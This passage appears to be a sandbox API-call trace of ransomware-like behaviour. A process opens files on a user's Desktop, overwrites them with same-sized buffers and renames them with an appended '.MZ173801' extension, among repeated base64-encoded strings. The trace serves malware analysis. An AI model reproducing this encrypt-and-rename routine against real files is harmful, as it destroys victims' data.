ftCreationTime.dwLowDateTime=0x451ae90, ftCreationTime.dwHighDateTime=0x1d5eae5, ftLastAccessTime.dwLowDateTime=0x869d6160, ftLastAccessTime.dwHighDateTime=0x1d5e4cc, ftLastWriteTime.dwLowDateTime=0x869d6160, ftLastWriteTime.dwHighDateTime=0x1d5e4cc, nFileSizeHigh=0x0, nFileSizeLow=0x16cb3)) returned 1 [0124.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.454] GetCurrentThreadId () returned 0x1358 [0124.454] GetCurrentThreadId () returned 0x1358 [0124.454] GetCurrentThreadId () returned 0x1358 [0124.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.455] GetCurrentThreadId () returned 0x1358 [0124.455] GetCurrentThreadId () returned 0x1358 [0124.455] GetCurrentThreadId () returned 0x1358 [0124.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\w WakBZH3I.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\w wakbzh3i.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.455] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.455] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.455] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x16cb3 [0124.455] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.455] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x16cb3, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x16cb3, lpOverlapped=0x0) returned 1 [0124.457] CloseHandle (hObject=0x414) returned 1 [0124.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\w WakBZH3I.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\w wakbzh3i.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.459] WriteFile (in: hFile=0x414, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x16cb3, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x16cb3, lpOverlapped=0x0) returned 1 [0124.462] CloseHandle (hObject=0x414) returned 1 [0124.462] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\w WakBZH3I.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\w wakbzh3i.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\w WakBZH3I.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\w wakbzh3i.pps.mz173801")) returned 1 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] GetCurrentThreadId () returned 0x1358 [0124.466] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9bfcd0, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xf3bf4bb0, ftLastAccessTime.dwHighDateTime=0x1d5ed04, ftLastWriteTime.dwLowDateTime=0xf3bf4bb0, ftLastWriteTime.dwHighDateTime=0x1d5ed04, nFileSizeHigh=0x0, nFileSizeLow=0x2008, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="_5 PohF4cOl3RenyNkzK.gif", cAlternateFileName="_5POHF~1.GIF")) returned 1 [0124.466] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.466] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\_5 PohF4cOl3RenyNkzK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\_5 pohf4col3renynkzk.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9bfcd0, ftCreationTime.dwHighDateTime=0x1d5e0ee, ftLastAccessTime.dwLowDateTime=0xf3bf4bb0, ftLastAccessTime.dwHighDateTime=0x1d5ed04, ftLastWriteTime.dwLowDateTime=0xf3bf4bb0, ftLastWriteTime.dwHighDateTime=0x1d5ed04, nFileSizeHigh=0x0, nFileSizeLow=0x2008)) returned 1 [0124.467] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.467] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.467] GetCurrentThreadId () returned 0x1358 [0124.467] GetCurrentThreadId () returned 0x1358 [0124.467] GetCurrentThreadId () returned 0x1358 [0124.468] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.468] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.468] GetCurrentThreadId () returned 0x1358 [0124.468] GetCurrentThreadId () returned 0x1358 [0124.468] GetCurrentThreadId () returned 0x1358 [0124.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\_5 PohF4cOl3RenyNkzK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\_5 pohf4col3renynkzk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.468] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.468] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.468] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x2008 [0124.468] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.468] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2008, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x2008, lpOverlapped=0x0) returned 1 [0124.469] CloseHandle (hObject=0x414) returned 1 [0124.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\_5 PohF4cOl3RenyNkzK.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\_5 pohf4col3renynkzk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.470] WriteFile (in: 